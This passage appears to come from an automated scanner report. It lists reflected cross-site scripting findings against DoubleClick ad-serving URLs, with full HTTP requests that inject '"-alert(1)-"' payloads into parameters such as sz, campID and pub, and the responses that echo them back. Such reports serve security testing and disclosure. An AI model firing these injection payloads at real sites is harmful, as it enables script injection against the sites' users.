Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:15 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=16629109eff5"-alert(1)-"d3279316554&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re
...[SNIP]...

6.58. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88246"-alert(1)-"34f3da19b89 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-11077488246"-alert(1)-"34f3da19b89&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:38 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-11077488246"-alert(1)-"34f3da19b89&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2
...[SNIP]...

6.59. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 768d1"-alert(1)-"4d04f2c569 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml768d1"-alert(1)-"4d04f2c569&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:47 GMT
Content-Length: 9311

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml768d1"-alert(1)-"4d04f2c569&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Asterplosion.tos%3Fa%3DIVN%26%26cid%3DGENRET%3B877237%3B62579858%3B239944212%3B39988944");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

6.60. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [campID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64a83"-alert(1)-"d897ed4d1c2 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=8034064a83"-alert(1)-"d897ed4d1c2&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:53:46 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=8034064a83"-alert(1)-"d897ed4d1c2&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer
...[SNIP]...

6.61. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [crID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60583"-alert(1)-"42928ca0e0e was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=11078160583"-alert(1)-"42928ca0e0e&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:53:56 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=11078160583"-alert(1)-"42928ca0e0e&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%
...[SNIP]...

6.62. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [partnerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ec41"-alert(1)-"31c5ba5de38 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=93ec41"-alert(1)-"31c5ba5de38&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:25 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=93ec41"-alert(1)-"31c5ba5de38&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2
...[SNIP]...

6.63. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edfc6"-alert(1)-"fc5c4421cff was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078edfc6"-alert(1)-"fc5c4421cff&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:16 GMT
Content-Length: 9308

